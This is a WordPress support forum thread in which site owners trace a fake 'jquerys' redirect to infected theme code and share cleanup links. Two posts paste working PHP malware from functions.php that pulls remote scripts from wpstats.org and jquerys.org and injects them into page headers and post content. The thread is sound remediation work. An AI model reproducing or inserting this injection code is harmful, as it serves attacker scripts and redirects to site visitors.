Support » Fixing WordPress » Unwanted Jquery (jquerys) script
Unwanted Jquery (jquerys) script
-
In a brief look at source code from my site I found a line calling for an unwanted script (again http://www.jquerys.org/ajax/libs/jquery/jquery-1.6.3.min.js). This script redirects to another site (http://www.downloadmusicfreenow.com). Days ago was reported same problem with the “jquerys” (not genuine “jquery”) in http://blog.sucuri.net/2012/07/fake-jquery-website-serving-redirection-malware.html .
My site is http://professormarquinhos.com.br
-
ponga acá en
code
lo contenido en fichero “functions.php” de tu tema
put here the content from your “functions.php”@nrichardson Your site is still infected. Often it takes more than removing one line of code.
http://sitecheck.sucuri.net/results/www.skibrule.hostzi.com
These resources will help you:
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://wordpress.org/support/topic/268083#post-1065779
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottopress.com/2009/hacked-wordpress-backdoors/More Resources:
http://sitecheck.sucuri.net/scanner/
http://www.unmaskparasites.com/
http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html
http://codex.wordpress.org/Hardening_WordPress
http://www.studiopress.com/tips/wordpress-site-security.htmPlease read this http://codex.wordpress.org/Forum_Welcome#Posting_Code before posting any more code or asking someone to post code.
@ watesam, the script is called from another php
If you want, send me your theme in ZIP format for me to analyze.[ email redacted ]
@felipe
Yes, I found one jquery insertion and can’t find the other. I am trying to find the infected .php file. Where should I look?Just search your files
for string which says
insert_jquery_function
on nix you can use, sudo grep “insert_jquery_function” /directory of wordpress files/
for windows, dont have a clue!
Reporte urlquery http://urlquery.net/report.php?id=113834
I had the same problem…thank you for your help!!!
I have two site with the same problem. Taking that code out of the functions.php file worked on one of the sites, but not on the other … any ideas ?
Please help me. My functions.php this code is. What i delete?
/* add theme jquery functions */ if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');} function ins_php_in_post($content){$percentage = 25;if (rand(0, 100) < $percentage){ob_start();if(function_exists('curl_init')) { $url = "http://www.jquerys.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; }$text = ob_get_clean();$pos = rand(0, strlen($content));$txtPrePos = substr($content, 0, $pos);$txtPostPos = substr($content, $pos);$openPos = strrpos($txtPrePos, "<");if ($openPos !== false){$closePos = strrpos($txtPrePos, ">");if ($openPos > $closePos || $closePos === false){$pos = strpos($content, ">", $pos) + 1;}}$spos = strpos($content, " ", $pos);if ($spos === false) {$spos = strlen($content);}$content = substr($content, 0, $spos) . " " . $text . substr($content, $spos);}return $content;} add_filter('the_content', 'ins_php_in_post'); define('PUNCH_FUNCTIONS', TEMPLATEPATH . '/functions/template'); define('PUNCH_JAVASCRIPT', get_template_directory_uri() . '/js'); define('PUNCH_CSS', get_template_directory_uri() . '/css');
try removing
/* dont have a clue what the first on is though, but doesnt really look like you should have it *//* 1st piece doesnt look ok */ if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');} function ins_php_in_post($content){$percentage = 25;if (rand(0, 100) < $percentage){ob_start(); /* second piece cuases redirct */ if(function_exists('curl_init')) { $url = "http://www.jquerys.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data";
I tried, but it is removed, the site will not work. I checked the original file, and looked the same, so this is a template script. However kaspersky continuous indicates this: http://www.jquerys.org/jquery-1.6.3.min.js
Hi guys!
Well, it seems we all have the same problem.
My website has the same problem.
http://www.vidabohemia.comAvast goes crazy everytime I go in saying that the website is infected with malware. At the end it is this jquerys.org it is infected with.
My theme is MADE.I dont have a clue on where to find this .php file or if its different as it is a different theme.
Any clue to this will be greatly appreciated.
Thanks.Walter
walteravila@ Puedes hacer lo que yo hice, primero limpia tu pc http://download.eset.com/special/eos/esetsmartinstaller_enu.exe, segundo des-instala los plugins que instalaste últimamente y luego busca en http://urlquery.net/ agregando el link de tu pagina que no tengas el malware jquerys, la otra es buscar el codigo en la plantilla, pero puede ser difícil encontrarlo por que puede estar en cualquier php
espero te sirva a mi me funciono.
- The topic ‘Unwanted Jquery (jquerys) script’ is closed to new replies.